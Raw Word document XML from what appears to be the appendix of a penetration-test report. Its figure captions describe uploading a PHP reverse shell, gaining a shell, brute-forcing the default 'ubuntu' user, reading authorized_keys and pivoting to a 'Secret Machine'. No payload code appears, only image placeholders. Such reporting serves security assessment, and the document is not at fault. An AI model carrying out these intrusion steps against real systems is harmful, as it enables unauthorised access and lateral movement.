    <w:p w14:paraId="7A867C78" w14:textId="77777777" w:rsidR="0027437D" w:rsidRDefault="0027437D" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259B397F" w14:textId="6DCA0749" w:rsidR="005D4C66" w:rsidRPr="00D77DFE" w:rsidRDefault="005D4C66" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="182FCCBE" wp14:editId="6FB0D436">
            <wp:extent cx="3821502" cy="2695575"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="2468044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3">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="28611"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3821502" cy="2695575"/>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10" w:name="resource88"/>
    <w:p w14:paraId="27C89AA7" w14:textId="4228B4B7" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0"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"paragraph88"</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A.69:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="310"/>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Tester Uploaded PHP Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E1944" w14:textId="77777777" w:rsidR="009E181E" w:rsidRPr="00D77DFE" w:rsidRDefault="009E181E" w:rsidP="00587026">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531E167D" w14:textId="3838D47C" w:rsidR="00AB5D85" w:rsidRPr="00D77DFE" w:rsidRDefault="005D4C66" w:rsidP="0027437D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BCE6656" wp14:editId="1D5B1F90">
            <wp:extent cx="4097547" cy="2170634"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="121766751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4103953" cy="2174027"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="311" w:name="resource89"/>
    <w:p w14:paraId="64B1F0E3" w14:textId="2EA9AFDE" w:rsidR="00590555" w:rsidRPr="00D77DFE" w:rsidRDefault="00590555"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"paragraph89"</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A.70:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="007A78B0" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Uploaded Shell </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007A78B0" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007A78B0" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tester under /uploads/ endpoint</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="311"/>
    <w:p w14:paraId="18C30975" w14:textId="77777777" w:rsidR="00590555" w:rsidRPr="00D77DFE" w:rsidRDefault="00590555" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79705E8E" w14:textId="4CAEBAF2" w:rsidR="005D4C66" w:rsidRPr="00D77DFE" w:rsidRDefault="005D4C66" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>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74ABAF48" wp14:editId="466662DD">
            <wp:extent cx="5088854" cy="750491"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6998839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108254" cy="753352"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="312" w:name="resource90"/>
    <w:p w14:paraId="244FC175" w14:textId="3ECC93E4" w:rsidR="00590555" w:rsidRPr="00D77DFE" w:rsidRDefault="00590555" w:rsidP="009E5B3F">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"paragraph90"</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A.71:</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Gaining a Reverse Shell </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Server</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="312"/>
    <w:p w14:paraId="16B42A0D" w14:textId="77777777" w:rsidR="00590555" w:rsidRPr="00D77DFE" w:rsidRDefault="00590555" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D66F19" w14:textId="77777777" w:rsidR="0027437D" w:rsidRDefault="0027437D" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7552D8B6" w14:textId="4115AE8F" w:rsidR="003D4AE4" w:rsidRPr="00D77DFE" w:rsidRDefault="003D4AE4" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D1EC019" wp14:editId="308D8AE1">
            <wp:extent cx="4718649" cy="1148080"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="134957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77152" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId130"/>
                    <a:srcRect r="20970"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4753777" cy="1156627"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="313" w:name="resource91"/>
    <w:p w14:paraId="4B33C05B" w14:textId="49526D2A" w:rsidR="00590555" w:rsidRPr="00512AA9" w:rsidRDefault="00590555" w:rsidP="00512AA9">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"paragraph91"</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A.72</w:t>
      </w:r>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Brute Force Attack Against Default </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ser ubuntu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1265CC3B" w14:textId="77777777" w:rsidR="0027437D" w:rsidRDefault="0027437D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59BD53A6" w14:textId="1EDCA9AB" w:rsidR="003D4AE4" w:rsidRPr="00D77DFE" w:rsidRDefault="003D4AE4" w:rsidP="0027437D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="039DD9E8" wp14:editId="13863645">
            <wp:extent cx="4597879" cy="407670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14504687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1">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="23864"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4650730" cy="412356"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="314" w:name="resource92"/>
    <w:p w14:paraId="2C5E1A1F" w14:textId="7A32CE34" w:rsidR="00590555" w:rsidRPr="00D77DFE" w:rsidRDefault="00590555" w:rsidP="00512AA9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>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"paragraph92"</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A.73</w:t>
      </w:r>
      <w:bookmarkEnd w:id="314"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Content of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6CD09A" w14:textId="57BDBC9B" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="00F257D9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F99E82C" wp14:editId="4928FFF0">
            <wp:extent cx="4208960" cy="2931373"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="15811263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215672" cy="2936047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="315" w:name="resource93"/>
    <w:p w14:paraId="121278BB" w14:textId="0A1D9AF4" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00590555" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>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"paragraph93"</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A.74</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tester Found the SSH Key and Authenticate to the Secret Machine</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC16C1" w14:textId="77777777" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="00F257D9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640EBCC2" w14:textId="77777777" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="00F257D9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B12B2FD" w14:textId="77777777" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="00F257D9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39786E66" w14:textId="77777777" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="00F257D9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25464594" w14:textId="77777777" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770F91E2" w14:textId="63291708" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="00590555">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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6240D95F" wp14:editId="1AEC9461">
            <wp:extent cx="4390114" cy="2496835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14816028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4397121" cy="2500820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4A751" w14:textId="1AFA3489" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="00F257D9">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573D034E" wp14:editId="073BC4D1">
            <wp:extent cx="3752850" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3817815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752850" cy="819150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="316" w:name="resource94"/>
    <w:p w14:paraId="7ACE7105" w14:textId="2CCE3212" w:rsidR="00590555" w:rsidRPr="00D77DFE" w:rsidRDefault="00590555" w:rsidP="00590555">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "paragraph94"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Figure A.75</w:t>
      </w:r>
      <w:bookmarkEnd w:id="316"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tester Found Secret Machine from the ServerMeta Machine</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E46849" w14:textId="77777777" w:rsidR="00590555" w:rsidRPr="00D77DFE" w:rsidRDefault="00590555" w:rsidP="00F257D9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F3AD44" w14:textId="1D5BDA59" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="0027437D">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
